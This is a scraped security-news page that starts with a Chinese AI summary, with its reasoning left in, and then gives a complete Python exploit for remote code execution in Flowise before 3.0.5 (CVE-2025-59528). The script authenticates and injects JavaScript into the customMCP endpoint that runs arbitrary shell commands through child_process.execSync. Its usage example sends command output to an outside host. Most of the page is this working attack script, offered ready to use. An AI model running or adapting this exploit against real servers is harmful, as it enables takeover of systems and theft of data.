好的,我现在需要帮用户总结一篇关于Flowise 3.0.4远程代码执行漏洞的文章,控制在100字以内。首先,我得仔细阅读用户提供的内容,了解文章的主要信息。 文章标题是“Flowise 3.0.4 - Remote Code Execution (RCE)”,日期是2025年10月11日,作者是nltt0。漏洞影响版本是3.0.5以下,CVE编号是CVE-2025-59528。文章内容是一个Python脚本,展示了如何利用这个漏洞进行攻击。 接下来,我需要提取关键信息:漏洞名称、影响版本、攻击方式、利用方法以及CVE编号。然后,把这些信息浓缩成一句话,确保不超过100字,并且不使用“文章内容总结”之类的开头。 可能会遇到的问题是如何在有限的字数内准确传达所有重要信息。我需要确保包含漏洞名称、版本范围、攻击类型和CVE编号。同时,要避免使用过于技术性的术语,让总结更易理解。 最后,检查字数是否符合要求,并确保信息准确无误。这样就能为用户提供一个简洁明了的总结。 </think> Flowise 3.0.4 存在远程代码执行漏洞(RCE),影响版本低于 3.0.5。攻击者可通过构造恶意请求在目标系统上执行任意命令。该漏洞已公开修复,并分配了 CVE 编号 CVE-2025-59528。 2025-11-1 19:53:49 Author: cxsecurity.com(查看原文) 阅读量:12 收藏
Flowise 3.0.4 Remote Code Execution
# Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE) # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-59528 from requests import post, session from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 """ try: parser = ArgumentParser(description='CVE-2025-59528 [Flowise < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --password Test@2025 --url http://localhost:3000 --cmd \"http://localhost:1337/`whoami`\"") parser.add_argument('-e', '--email', required=True, help='Registered email') parser.add_argument('-p', '--password', required=True) parser.add_argument('-u', '--url', required=True) parser.add_argument('-c', '--cmd', required=True) args = parser.parse_args() email = args.email password = args.password url = args.url cmd = args.cmd def login(email, url): session = session() url_format = "{}/api/v1/auth/login".format(url) headers = {"x-request-from": "internal", "Accept-Language": "pt-BR,pt;q=0.9", "Accept": "application/json, text/plain, */*", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Origin": "http://workflow.flow.hc", "Referer": "http://workflow.flow.hc/signin", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} data={"email": email, "password": password} r = session.post(url_format, headers=headers, json=data) return session, r def rce(email, url, password, cmd): session, status_code = login(email, url) url_format = "{}/api/v1/node-load-method/customMCP".format(url) command = f'({{x:(function(){{const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;}})()}})' data = { "loadMethod": "listActions", "inputs": { "mcpServerConfig": command } } r = session.post(url_format, json=data) if r.status_code == 401: session.headers["x-request-from"] = "internal" session.post(url_format, json=data) print(f"[x] Command executed [{cmd}]") rce(email, url, password, cmd) except Exception as e: print('Error in {}'.format(e))
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh